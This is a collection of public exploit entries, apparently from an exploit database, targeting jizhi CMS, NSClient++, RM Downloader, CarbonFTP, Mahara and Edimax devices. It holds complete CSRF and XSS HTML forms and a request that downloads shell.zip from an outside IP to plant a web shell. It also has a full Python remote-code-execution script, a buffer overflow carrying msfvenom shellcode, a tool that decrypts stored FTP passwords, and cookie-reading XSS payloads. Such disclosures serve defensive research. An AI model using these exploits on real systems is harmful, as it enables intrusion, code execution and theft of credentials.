<input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow -->
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
<!-- XSS modify labels -->
<html>
<body>
<form action="http://192.168.1.17:83/config.html" method="POST">
<input type="hidden" name="lab1" value="Channel1" />
<input type="hidden" name="lab2" value="Channel2" />
<input type="hidden" name="lab3" value="Channel3" />
<input type="hidden" name="lab4" value='"><script>confirm(251)</script>' />
<input type="hidden" name="lab12" value="etc." />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download
# Google Dork: jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Vendor Homepage: https://www.jizhicms.cn/
# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip
# Version: 1.6.7
# Tested on: Mac OS
# CVE : N/A
Data 1.
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 86
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close
action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip
Data 2.
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 32
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close
action=file-upzip&filepath=shell
# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: kindredsec
# Vendor Homepage: https://nsclient.org/
# Software Link: https://nsclient.org/download/
# Version: 0.5.2.35
# Tested on: Microsoft Windows 10 Pro (x64)
# CVE: N/A
#
# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt
# Default, this leads to privileged code execution.
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup as bs
import urllib3
import json
import sys
import random
import string
import time
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def generateName():
letters = string.ascii_lowercase + string.ascii_uppercase
return ''.join(random.choice(letters) for i in range(random.randint(8,13)))
def printStatus(message, msg_type):
C_YELLOW = '\033[1;33m'
C_RESET = '\033[0m'
C_GREEN = '\033[1;32m'
C_RED = '\033[1;31m'
if msg_type == "good":
green_plus = C_GREEN + "[+]" + C_RESET
string = green_plus + " " + message
elif msg_type == "info":
yellow_ex = C_YELLOW + "[!]" + C_RESET
string = yellow_ex + " " + message
elif msg_type == "bad":
red_minus = C_RED + "[-]" + C_RESET
string = red_minus + " " + message
print(string)
# This function adds a new external script containing the desired
# command, then saves the configuration
def configurePayload(session, cmd, key):
printStatus("Configuring Script with Specified Payload . . .", "info")
endpoint = "/settings/query.json"
node = { "path" : "/settings/external scripts/scripts",
"key" : key }
value = { "string_data" : cmd }
update = { "node" : node , "value" : value }
payload = [ { "plugin_id" : "1234",
"update" : update } ]
json_data = { "type" : "SettingsRequestMessage", "payload" : payload }
out = session.post(url = base_url + endpoint, json=json_data, verify=False)
if "STATUS_OK" not in str(out.content):
printStatus("Error configuring payload. Hit error at: " + endpoint, "bad")
sys.exit(1)
printStatus("Added External Script (name: " + key + ")", "good")
time.sleep(3)
printStatus("Saving Configuration . . .", "info")
header = { "version" : "1" }
payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ]
json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload }
session.post(url = base_url + endpoint, json=json_data, verify=False)
# Since the application needs to be restarted after making changes,
# this function reloads the application, and waits for it to come back.
def reloadConfig(session):
printStatus("Reloading Application . . .", "info")
endpoint = "/core/reload"
session.get(url = base_url + endpoint, verify=False)
# Wait until the application successfully reloads by making a request
# every 10 seconds until it responds.
printStatus("Waiting for Application to reload . . .", "info")
time.sleep(10)
response = False
count = 0
while not response:
try:
out = session.get(url = base_url, verify=False, timeout=10)
if len(out.content) > 0:
response = True
except:
count += 1
if count > 10:
printStatus("Application failed to reload. Nice DoS exploit! /s", "bad")
sys.exit(1)
else:
continue
# This function makes the call to the new external script to
# ultimately execute the code.
def triggerPayload(session, key):
printStatus("Triggering payload, should execute shortly . . .", "info")
endpoint = "/query/" + key
try:
session.get(url = base_url + endpoint, verify=False, timeout=10)
except requests.exceptions.ReadTimeout:
printStatus("Timeout exceeded. Assuming your payload executed . . .", "info")
sys.exit(0)
# Before setting up the exploit, this function makes sure the
# required feature (External Scripts) is enabled on the application.
def enableFeature(session):
printStatus("Enabling External Scripts Module . . .", "info")
endpoint = "/registry/control/module/load"
params = { "name" : "CheckExternalScripts" }
out = session.get(url = base_url + endpoint, params=params, verify=False)
if "STATUS_OK" not in str(out.content):
printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad")
sys.exit(1)
# This function obtains an authentication token that gets added to all
# remaining headers.
def getAuthToken(session):
printStatus("Obtaining Authentication Token . . .", "info")
endpoint = "/auth/token"
params = { "password" : password }
auth = session.get(url = base_url + endpoint, params=params, verify=False)
if "auth token" in str(auth.content):
j = json.loads(auth.content)
authToken = j["auth token"]
printStatus("Got auth token: " + authToken, "good")
return authToken
else:
printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad")
sys.exit(1)
parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE")
parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.')
parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.')
parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.')
parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target')
args = parser.parse_args()
if len(sys.argv) < 4:
parser.print_help()
sys.exit(1)
# Build base URL, grab needed arguments
base_url = "https://" + args.t + ":" + args.P
printStatus("Targeting base URL " + base_url, "info")
password = args.p
cmd = args.c
# Get first auth token, and add it to headers of session
s = requests.session()
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})
# Generate a random name, enable the feature, add the payload,
# then reload.
randKey = generateName()
enableFeature(s)
configurePayload(s, cmd, randKey)
reloadConfig(s)
# Since application was reloaded, need a new auth token.
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})
# Execute our code.
triggerPayload(s, randKey)
# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)
# Date: 2020-04-20
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe
# Version: 3.1.3.2.2010.06.13
# Tested on: Windows 7 (x86)
# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open 'RmDownloader.exe'
# 4.- Go to 'Load' tab
# 5.- Paste clipboard in 'Load' parameter
# 6.- Click on button 'OK'
# 7.- Two messageboxes regarding the length of the payload will pop up, click OK
# 8.- Profit
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 448 bytes
buf = b""
buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b"
buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35"
buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c"
buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b"
buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35"
buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32"
buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79"
buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32"
buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32"
buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51"
buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30"
buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64"
buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b"
buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70"
buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71"
buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78"
buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70"
buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b"
buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56"
buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a"
buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e"
buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61"
buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62"
buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f"
buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31"
buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55"
buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b"
buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62"
buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70"
buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48"
buf += b"\x50\x65\x67\x70\x41\x41"
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll)
buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
# Date: 2020-04-20
# Author: hyp3rlinx
# Vendor:
# CVE: CVE-2020-6857
import time, string, sys, argparse, os, codecs
#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
#This should be compatible for Python 2 and 3 versions now, tested successfully.
#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947
key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5 #number of bytes we must decrypt the password by.
#Password is stored here:
#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP
#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================
def carbonftp_conf(conf_file):
p=""
pipe=-1
passwd=""
lst_of_passwds=[]
try:
for p in conf_file:
idx = p.find("Password=STRING|")
if idx != -1:
pipe = p.find("|")
if pipe != -1:
passwd = p[pipe + 2: -2]
print(" Password found: "+ passwd)
lst_of_passwds.append(passwd)
except Exception as e:
print(str(e))
return lst_of_passwds
def reorder(lst):
k=1
j=0
for n in range(len(lst)):
k+=1
j+=1
try:
tmp = lst[n+k]
a = lst[n+j]
lst[n+j] = tmp
lst[n+k] = a
except Exception as e:
pass
return ''.join(lst)
def dec2hex(dec):
tmp = str(hex(int(dec)))
return str(tmp[2:])
#Updated for Python version compatibility.
def hex2ascii(h):
h=h.strip()
passwd=""
try:
passwd = codecs.decode(h, "hex").decode("ascii")
except Exception as e:
print("[!] In hex2ascii(), not a valid hex string.")
exit()
return passwd
def chunk_passwd(passwd_lst):
lst = []
for passwd in passwd_lst:
while passwd:
lst.append(passwd[:chunk_sz])
passwd = passwd[chunk_sz:]
return lst
def strip_non_printable_char(str):
return ''.join([x for x in str if ord(x) > 31 or ord(x)==9])
cnt = 0
passwd_str=""
def deob(c):
global cnt, passwd_str
tmp=""
try:
tmp = int(c) - int(key, 16)
tmp = dec2hex(tmp)
except Exception as e:
print("[!] Not a valid CarbonFTP encrypted password.")
exit()
b=""
a=""
#Seems we can delete the second char as its most always junk.
if cnt!=1:
a = tmp[:2]
cnt+=1
else:
b = tmp[:4]
passwd_str += strip_non_printable_char(hex2ascii(a + b))
hex_passwd_lst = list(passwd_str)
return hex_passwd_lst
def no_unique_chars(lst):
c=0
k=1
j=0
for i in range(len(lst)):
k+=1
j+=1
try:
a = lst[i]
b = lst[i+1]
if a != b:
c+=1
elif c==0:
print("[!] Possible one char password?: " +str(lst[0]))
return lst[0]
except Exception as e:
pass
return False
def decryptor(result_lst):
global passwd_str, sz
print(" Decrypting ... \n")
for i in result_lst:
print("[-] "+i)
time.sleep(0.1)
lst = deob(i)
#Re-order chars to correct sequence using custom swap function (reorder).
reordered_pass = reorder(lst)
sz = len(reordered_pass)
#Flag possible single char password.
no_unique_chars(lst)
print("[+] PASSWORD LENGTH: " + str(sz))
if sz == 9:
return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " +
reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
#Shorter passwords less then nine chars will have several candidates
#as they get padded with repeating chars so we return those.
passwd_str=""
return reordered_pass
def display_cracked_passwd(sz, passwd):
if sz==9:
print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
else:
print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
return parser.parse_args()
def main(args):
global passwd_str, sz
victim=""
if args.user and args.encrypted_password:
print("[!] Supply a victims username -u or single encrypted password -p, not both.")
exit()
print("[+] Neowise CarbonFTP v1.4")
time.sleep(0.1)
print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
time.sleep(0.1)
print("[+] Version 2 Exploit fixed for Python 3 compatibility")
time.sleep(0.1)
print("[+] Discovered and cracked by hyp3rlinx")
time.sleep(0.1)
print("[+] ApparitionSec\n")
time.sleep(1)
#Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
if args.user:
victim = args.user
os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
dir_lst = os.listdir(".")
for c in dir_lst:
f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
#Get encrypted password from conf file
passwd_enc = carbonftp_conf(f)
#Break up into 5 byte chunks as processed by the proprietary decryption routine.
result_lst = chunk_passwd(passwd_enc)
#Decrypt the 5 byte chunks and reassemble to the cleartext password.
cracked_passwd = decryptor(result_lst)
#Print cracked password or candidates.
display_cracked_passwd(sz, cracked_passwd)
time.sleep(0.3)
passwd_str=""
f.close()
#Crack a single password -p flag.
if args.encrypted_password:
passwd_to_crack_lst = []
passwd_to_crack_lst.append(args.encrypted_password)
result = chunk_passwd(passwd_to_crack_lst)
#Print cracked password or candidates.
cracked_passwd = decryptor(result)
display_cracked_passwd(sz, cracked_passwd)
if __name__=="__main__":
parser = argparse.ArgumentParser()
if len(sys.argv)==1:
parser.print_help(sys.stderr)
exit()
main(parse_args())
# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-21
# Vendor: https://mahara.org
# Software Link: https://launchpad.net/mahara
# CVE: N/A
Document Title:
===============
Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2217
Release Date:
=============
2020-04-21
Common Vulnerability Scoring System:
====================================
4.3
Affected Product(s):
====================
Catalyst IT Ltd.
Product: Mahara v19.10.2 - CMS (Web-Application)
https://launchpad.net/mahara & https://mahara.org
Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Mahara v19.10.2 CMS web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The persistent vulnerability is located in the `nombre` and
`descripción` parameters of the `Ficheros` module in the
`groupfiles.php` file.
Remote attackers with low privileges are able to inject own malicious
persistent script code as files and foldernames. The injected code can
be used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector is located on
the application-side. Files are able to be reviewed in the backend by
higher privileged accounts and can be shared.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Ficheros (Files Manager)
Vulnerable Input(s):
[+] Crear Carpeta
Vulnerable File(s):
[+] groupfiles.php
Vulnerable Parameter(s):
[+] nombre
[+] descripción
Affected Module(s):
[+] Página principal
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce ...
1. Open the web-application and login as regular user
2. Move inside the mygroup management
3. Open the ficheros tab on top
4. Inject test payload into the crear carpeta (Nombre & Descripción)
input field for the página principal to output
Note: The execution point occurs on edit, list and delete interaction
5. The created path listings are available for higher privileged user
account that review (Backend)
6. Successul reproduce of the persistent cross site web vulnerability!
PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal)
<tr id="file:7191" class="file-item folder no-hover ui-droppable">
<td class="icon-cell">
<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191"
tabindex="0">
<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
<span class="icon-folder-open icon icon-lg " role="presentation"
aria-hidden="true"></span>
</div></td>
<td class="filename">
<a
href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27"
id="changefolder:7191" class="inner-link changefolder">
<span class="sr-only">Carpeta:</span>
<span class="display-title ">>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
</a></td>
<td class="filedescription d-none d-md-table-cell">
>"<iframe></iframe> >"<iframe></iframe></td>
<td class="filesize"></td>
<td class="filedate">20/04/2020</td>
<!-- Ensure space for 3 buttons (in the case of a really long single
line string in a user input field -->
<td class="text-right control-buttons ">
<div class="btn-group">
... ...
<button name="files_filebrowser_edit[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-pencil-alt icon-lg" role="presentation"
aria-hidden="true"></span>
<span class="sr-only">Edit folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span></button>
<button name="files_filebrowser_delete[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-trash-alt text-danger icon-lg"
role="presentation" aria-hidden="true"></span>
<span class="sr-only">Delete folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span>
</button></div></td>
--- PoC Session Logs [POST] --- (Mygroup Ficheros)
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------98107146915324237501974151621
Content-Length: 4879
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0&
files_filebrowser_edit_title=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on&
files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=&
files_filebrowser_edit_licensor=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on&
files_filebrowser_update[7191]=Guardar
cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2-
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
-
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------126319663526561351602937008964
Content-Length: 3721
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=&
files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=&
sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2
Reference(s):
https://mahara_cms.localhost:8080/artefact/
https://mahara_cms.localhost:8080/artefact/file/
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
# Date: 2020-04-21
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version
CSRF PoC - Mac Filtering
----------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://172.20.10.2/goform/formWlAc" method="POST">
<input type="hidden" name="wlanAcEnabled" value="ON" />
<input type="hidden" name="tiny_idx" value="0" />
<input type="hidden" name="mac" value="ccbbbbbbbbbb" />
<input type="hidden" name="comment" value="PentesterTraining" />
<input type="hidden" name="addFilterMac" value="Add" />
<input type="hidden" name="submit-url"
value="/macfilter1_sub1.asp" />
<input type="hidden" name="wlanSSIDIndex" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
--
Besim ALTINOK
*Security Engineer*
# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password)
# Date: 2020-04-21
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version
-----------------------------
Here step by step :
1. I did Setup
2. After setup try to access to *wlencrypt_wiz.asp* file
3. After access to this file, I saw some information disclosure
(Like *WiFi Password*)
4. Here is the all leak here:
-------------------------------
<SCRIPT>
var _DATE_="Mon Sep 24 19:38:17 CST 2012";
var _VERSION_="1.13";
var _MODEL_="EW7438RPN";
var _MODE_="Edimax";
var _PLATFORM_="RTL8196CS_1200";
var _HW_LED_WPS_="4";
var _HW_LED_POWER_="6";
var _HW_LED_WIRELESS_="2";
var _HW_BUTTON_RESET_="5";
var _HW_BUTTON_WPS_="1";
var _HW_BUTTON_SWITCH_="3";
var _HW_LED_USB_="17";
var _WIRELESS_IGMPSNOOP_="y";
var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y";
var _RDISC_="y";
var _WPS_NO_BROADCAST_="y";
var _UPNP_LIB_VERSION2_="y";
var _WDS_UR_INFO_="y";
var _RESERVE_ENCRYPTION_SETTING_="y";
var _IGMP_PROXY_="y";
var _IGMPSNOOP_="y";
var _RFTYPE_="2T2R";
var _MEMBUS_="16";
var _MEMSIZE_="16";
var _MEMTYPE_="SDRAM";
var _FLASHTYPE_="SPI";
var _REMOVE_RADIUS_SERVER_="y";
var _AUTO_CHANNEL_DET_="y";
var _CONTROL_SIDEBAND_="y";
var _WIFI_11N_STANDARD_="y";
var _SETTING_WIZARD_="y";
var _CONFIG_FILE_NAME_="7438RPN";
var _AP_WITH_DNS_="y";
var _USE_DNRD_="y";
var _WPS_MIX_="y";
var _POWER_SAVING_="y";
var _WEB_FILE_NAME_="7438RPN";
var _PINCODE_BY_MAC_="y";
var _UPNP_RESPONDER_="y";
var _MDNS_RESPONDER_="y";
var _NETBIOS_RESPONDER_="y";
var _AP_WITH_DHCP_CLIENT_="y";
var _LLTD_NODENAME_="y";
var _DHCP_SWITCH_="y";
var _CONNECT_TEST_="y";
var _START_BOA_="y";
var _WPS_Daemon_="y";
var security = 1;
apMode = 6;
methodVal = 2;
opMode = 0;
apMachType = 1;
var ssidTbl = new Array("PentesterTraining");
